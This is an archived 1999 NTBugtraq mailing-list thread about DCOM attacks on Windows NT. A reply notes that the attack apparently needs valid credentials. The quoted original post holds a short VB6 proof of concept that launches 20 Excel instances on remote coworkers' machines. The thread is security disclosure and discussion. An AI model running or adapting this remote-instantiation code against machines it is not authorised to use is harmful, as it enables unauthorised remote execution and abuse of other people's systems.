Hi, Did you have credentials to authenticate to your coworker's machines? I was able to create arbitrary files remotely on other NT machines in my network using DCOM/Word/Create, but soon discovered that this was because I had domain admin credentials that were valid for each host. IE, DCOM attacks aren't effective if you don't have authentication credentials. If you have contrary information please let us know :) I could be mistaken, since ISS does a test for non-admin access to DCOM.. What are the chances ISS/NAI want to give full disclosure on their DCOM compromise technique? Required reading: Understanding the DCOM Wire Protocol by Analyzing Network Data Packets http://www.guyeddon.com/MSJ3-98.htm Using Distributed COM with Firewalls http://www.iapetus.com/dcom/dcomfw.htm Max Vision http://maxvision.net/ On Wed, 18 Aug 1999, Hargett, Matt wrote: > -----Original Message----- > From: Rob Lempke [mailto:rlempkeat_private] > Sent: Wednesday, August 11, 1999 1:27 PM > To: NTBUGTRAQat_private > Subject: DCOM attack against NT using VB6 > > > Using the code below I was able to create 20 instances of Excel on my > co-workers machines without modifying their machines at all. The target > must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to > prevent the attack. > > Private Sub Command1_Click() > Dim xlObj As Object > Dim xlCollection As New Collection > Dim i As Long > For i = 1 To 20 > Set xlObj = CreateObject("Excel.Application", "\\NTBox") > xlCollection.Add xlObj > Next i > > i = 1 > 'clean up > While xlCollection.Count > 0 > xlCollection.Remove (xlCollection.Count) > Wend > Set xlCollection = Nothing > End Sub > > -Robert E. Lempke > -------------------------------------------- > Steven Wright one Liners: > "Black holes are where God divided by zero." > "Quantum Mechanics: The dreams stuff is made of." > "Early bird gets the worm, but the second mouse gets the cheese." > "If everything seems to be going well, you have obviously overlooked > something." > "Join the Army, meet interesting people, kill them." > "Success always occurs in private, and failure in full view." > "Ambition is a poor excuse for not having enough sense to be lazy." > "Hard work pays off in the future. Laziness pays off now." > "Everyone has a photographic memory. Some don't have film." > "Drink until she's cute, but stop before the wedding." > -------------------------------------------- >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:31 PDT